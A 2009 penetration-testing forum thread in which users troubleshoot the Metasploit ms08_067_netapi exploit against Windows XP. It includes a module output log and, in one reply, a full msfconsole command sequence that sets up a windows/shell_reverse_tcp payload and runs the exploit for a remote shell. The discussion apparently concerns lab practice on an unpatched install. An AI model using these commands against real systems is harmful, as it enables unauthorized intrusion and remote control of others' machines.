Metasploit ms08_067_netapi question

**imported_apprentice** · 12-12-2009, 12:52 PM

hey guys i would like to know if you use this exploit and when it gets up to
Triggering the vulnerability and just stays like that, it isnt frozen nothing happens, should i just wait ? or run it again or try something else ??
thanks

**Archangel-Amael** · 12-12-2009, 01:47 PM

Originally Posted by apprentice

hey guys i would like to know if you use this exploit and when it gets up to
Triggering the vulnerability and just stays like that, it isnt frozen nothing happens, should i just wait ? or run it again or try something else ??
thanks

Why not try all three?
Furthermore what is your target box? Are you sure that you have met all of the conditions to make the exploit work? What exact commands did you use.
These are some details that will help us to help you.

**m-1-k-3** · 12-12-2009, 03:30 PM

Originally Posted by archangel.amael

Furthermore what is your target box?

ms08_067 is also quite unstable for some targets like win2k3 server, so you have to play a bit with it.

m-1-k-3

**imported_apprentice** · 12-12-2009, 04:17 PM

thanks for your reply guys, well im using msfgui,when i execute the module i select auto targetting, my payload is windows/shell/reverse_tcp and the RHOST is the ip then i execute it, this is the message on the output box

20:26:42 - ms08_067_netapi[*] Launching exploit windows/smb/ms08_067_netapi...
20:26:43 - ms08_067_netapi[*] Started reverse handler on port 4444
20:26:44 - ms08_067_netapi[*] Automatically detecting the target...
20:26:47 - ms08_067_netapi[*] Fingerprint: Windows XP Service Pack 3 - lang:English
20:26:47 - ms08_067_netapi[*] Selected Target: Windows XP SP3 English (NX)
20:26:47 - ms08_067_netapi[*] Triggering the vulnerability..

i guess maybe i watched to many tuts and follow what they are doing instead of why they are doing it, any guidence will be appreciated

**imported_vvpalin** · 12-12-2009, 04:56 PM

Loose the gui, grab an unpatched xp install then do like so. Assuming 192.168.1.100 is the box and 192.168.200 is you with port 9999 open.

./msfconsole
use windows/smb/ms08_067_netapi
set rhost 192.168.1.100
set payload windows/shell_reverse_tcp
set lhost 192.168.1.200
set lport 9999
exploit

enjoy!

@m-1-k-3
actually this is one of the most stable exploits

**Archangel-Amael** · 12-12-2009, 07:00 PM

Originally Posted by m-1-k-3

ms08_067 is also quite unstable for some targets like win2k3 server, so you have to play a bit with it.

m-1-k-3

Actually I used win2k3 the first time I followed the tutorial here on using the above. Maybe it was luck or whatever but I didn't have any problems with it at all.

@OP there is a guide here by pureh@te on messing around with this exploit.

**imported_apprentice** · 12-13-2009, 01:39 AM

thanks i will give it a go, should i change the default port to 9999 even if that port is not open, do you use windows/shell_reverse_tcp or windows/shell/reverse_tcp as the paylod ? thanks

**m-1-k-3** · 12-13-2009, 11:28 AM

Originally Posted by vvpalin

@m-1-k-3
actually this is one of the most stable exploits

have you checked it out on win2k3 server?

m-1-k-3

**m-1-k-3** · 12-13-2009, 11:29 AM

Originally Posted by archangel.amael

Actually I used win2k3 the first time I followed the tutorial here on using the above. Maybe it was luck or whatever but I didn't have any problems with it at all.

if you have a win2k3 server with NX you will get problems, without NX it is working quite smooth ...

m-1-k-3

**imported_apprentice** · 12-13-2009, 10:08 PM

ok thanks will give it ago

BackTrack Linux - Penetration Testing Distribution

Thread: Metasploit ms08_067_netapi question

Thread Tools

Search Thread

Display

Metasploit ms08_067_netapi question

Posting Permissions